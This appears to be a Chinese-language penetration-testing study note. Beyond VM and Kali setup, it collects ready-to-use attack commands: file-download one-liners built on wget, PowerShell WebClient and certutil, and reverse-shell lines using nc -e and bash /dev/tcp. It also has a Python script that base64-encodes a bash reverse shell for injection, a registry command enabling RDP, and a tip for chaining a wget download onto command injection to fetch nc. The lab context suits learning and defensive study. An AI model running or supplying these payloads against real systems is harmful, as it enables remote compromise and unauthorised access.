0x00.常用名词、文件下载、反弹shell

下载文章

方法一：下载谷歌插件fireshot，捕捉整个页面

方法二：使用js代码

• f12进入控制台，粘贴如下代码

(function(){
    $("#side").remove();
    $("#comment_title, #comment_list, #comment_bar, #comment_form, .announce, #ad_cen, #ad_bot").remove();
    $(".nav_top_2011, #header, #navigator").remove();
    $(".p4course_target, .comment-box, .recommend-box, #csdn-toolbar, #tool-box").remove();
    $("aside").remove();
    $(".tool-box").remove();
    $("#toolBarBox").remove();
    $("main").css('display','content');
    $("main").css('float','left');
    $(".option-box").remove();
    $("body").css('min-width',0);
    $(".option-box").remove();
    window.print();
})();

• 如下图所示

• 另存为pdf即可

参考链接：https://blog.csdn.net/weixin_44928129/article/details/122569120

虚拟机配置

• 安装好vmware之后，在首选项进行如下修改

• 创建新的虚拟机的时候，一直点下一步，创建磁盘容量的时候，选择单个文件

• win10的镜像可以去官网下载：https://www.microsoft.com/zh-cn/software-download/windows10/，这里是详细教程https://blog.csdn.net/Jackliu200911/article/details/116548055

  注意这两步：

  

• ubuntu20.04安装教程：https://blog.csdn.net/weixin_41805734/article/details/120698714
• win2k8
  • 开启3389端口，远程桌面：reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul
  • 关闭防火墙
  • 在物理机win+r，输入mstsc，进行连接
• kali官网：https://www.kali.org/
• kali的汉化
  • ctrl+alt+t，打开终端，在终端中执行dpkg-reconfigure locales
  • en_US.UTF-8 UTF-8改为不勾选，按下空格

• • 勾选zh-CN.UTF-8 UTF-8，按下回车选择第三个。若有zh_CN.GBK GBK也一起勾选上，没有就不用。

• • 重启之后，会有个提示，选择保留旧名称
• kali开启ssh服务
  • sudo vi /etc/ssh/sshd_config
  • # PasswordAuthentication yes的“#”去掉
  • 修改PermitrootLogin prohibit-password为PermitRootLogin yes

• • sudo service ssh restart，重启ssh服务。sudo service ssh status，查看ssh服务

渗透测试常用命令

查找文件find / -name flag ,*代表模糊查找(bash)
ps-ef | grep apt

  常用的命令：https://blog.csdn.net/weixin_43303273/article/details/83029138

  Linux：https://blog.csdn.net/liangpingguo/article/details/79140780

  cmd：https://www.cnblogs.com/air-of-code/p/6015590.html

  powershell：
        https://www.anquanke.com/post/id/87976
        https://www.anquanke.com/post/id/88851
        https://www.anquanke.com/post/id/89362

渗透测试常用名词

POC：概念验证，常指漏洞证明的代码，无害
EXP：利用，指利用系统漏洞进行攻击，每个漏洞都有其  独有  的exp，有害
Payload：有效载荷，成功exploit之后，真正再在标系统执行的代码或者指令，可用于  多个  漏洞

 参考链接：

  渗透测试专业术语：https://www.cnblogs.com/sunny11/p/13583083.html
　　ATT&CK：https://attack.mitre.org/

文件下载

对于文件下载和反弹shell的命令，棱角社区能够自动生成：

棱角社区：https://forum.ywhack.com/bountytips.php?download

• python启用临时web服务

python3 -m http.server -d / 8888
python2 -m simpleHTTPServer  -d / 8888
//-d指定启用web服务的路径，python在/下启动临时的http服务，使用wget下载会下载/下的，默认路径是/root

• Linux文件下载

wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe

• powershell文件下载

powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms10-051.exe', exploit.exe)"

• cmd文件下载

certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
copy \\127.0.0.1\files\ms10-051.exe exploit.exe

  其他不一一列举，可以在棱角社区进行查询。

防火墙

  防火墙有出站规则和入站规则，相较而言，出站规则比入站规则宽松很多。讲的通俗点，自己想出去限制少，别人想进来限制多。

反弹shell

ncat:

victim：
nc -e /bin/bash ip port     //linux
nc -e cmd ip port          //windows

listener:
nc -lvvnp port

bash：

victim：
bash -i >& /dev/tcp/ip/port 0>&1
sh -i >& /dev/tcp/ip/port 0>&1

listener:
nc -lvvnp port

python:

#!/usr/bin/env python
# coding=utf-8
import argparse,base64

def main():
    parser = argparse.ArgumentParser(description="")
    parser.add_argument('-i','--ip',help='回连IP',default="127.0.0.1")
    parser.add_argument('-p','--port',help='回连端口',default="3456")
    args = parser.parse_args()
    print(args)
    ip = args.ip
    port = args.port
    cmd = "bash -i >/dev/tcp/"+ip+"/"+port+" 0>&1"
    encoder = base64.b64encode(cmd.encode("utf-8"))
    try:
        print("bash -c {echo,"+encoder.decode("utf-8")+"}|{base64,-d}|{bash,-i}")
    except :
        print("可以使用-h参数查看帮助信息")

if __name__ == '__main__':
    main()

• kali用bash弹shell，会报错zsh: 没有那个文件或目录: /dev/tcp/ip/port。
  • 解决办法：sudo vi /etc/passwd,将zsh改成bash

   kali作为攻击机：172.168.10.128

   win2k8作为靶机：172.16.10.130

• ！！！靶机能够成功ping通kali，kali也能成功ping通靶机

• 在kali上开启临时的http服务，win2k8下载kali的/root/pentest目录下的nc.exe，并且重命名为a.exe。如果不开启http服务，失败结果如下一张图。为了方便实验，将a.exe改回nc.exe

• 正向连接

  • 情况一：防火墙开启，win2k8出站

• • 情况二：防火墙开启，kali入站，无法成功反弹shell

 

• • 情况三：防火墙关闭，kali入站，成功反弹shell

• 反向连接

  • 为什么要反向连接？
    • 目标在局域网内，攻击机无法ping通目标
    • 端口占用
    • 由于防火墙等限制，目标主机只能发送请求，不能接收请求
    • ip动态改变

• 进行网络上的修改，取消勾选箭头所示

• win2k8靶机：172.16.10.130，物理机：192.168.0.183。内网可以访问外网，外网访问不了内网

• 防火墙开启，无法访问内网的情况下，能成功反弹shell

思路

• 如果有RCE，可以尝试绕过。如127.0.0.1 & wget http://ip:port/example.exe，帮目标机下载安装nc，再用ncat进行反弹
• 直接用bash进行反弹shell